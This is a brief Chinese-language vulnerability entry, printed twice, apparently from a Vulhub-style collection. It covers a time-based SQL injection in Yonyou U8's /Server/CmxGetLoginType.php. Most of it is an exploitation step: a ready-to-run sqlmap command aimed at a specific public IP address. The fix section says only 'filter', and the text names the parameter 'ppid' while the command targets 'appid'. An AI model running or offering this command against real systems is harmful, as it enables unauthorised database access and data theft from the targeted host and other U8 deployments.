VULHUB ™

###0x01漏洞简介 yonyou up U8系统在/Server/CmxGetLoginType.php对参数参数ppid过滤不严格，导致存在SQL注入漏洞。远程攻击者可以结合时间延迟注入方式，执行SQL指令，获取敏感信息。 ###0x02漏洞利用 这次存在漏洞的文件： ``` /Server/CmxGetLoginType.php?a=RAS_admin&appid=1 sqlmap.py -u "http://218.27.137.242:8080/Server/CmxGetLoginType.php?a=RAS_admin&appid=1" -p appid --technique T --dbms mysql ```  ###0x03修复方案 过滤。

###0x01漏洞简介 yonyou up U8系统在/Server/CmxGetLoginType.php对参数参数ppid过滤不严格，导致存在SQL注入漏洞。远程攻击者可以结合时间延迟注入方式，执行SQL指令，获取敏感信息。 ###0x02漏洞利用 这次存在漏洞的文件： ``` /Server/CmxGetLoginType.php?a=RAS_admin&appid=1 sqlmap.py -u "http://218.27.137.242:8080/Server/CmxGetLoginType.php?a=RAS_admin&appid=1" -p appid --technique T --dbms mysql ```  ###0x03修复方案 过滤。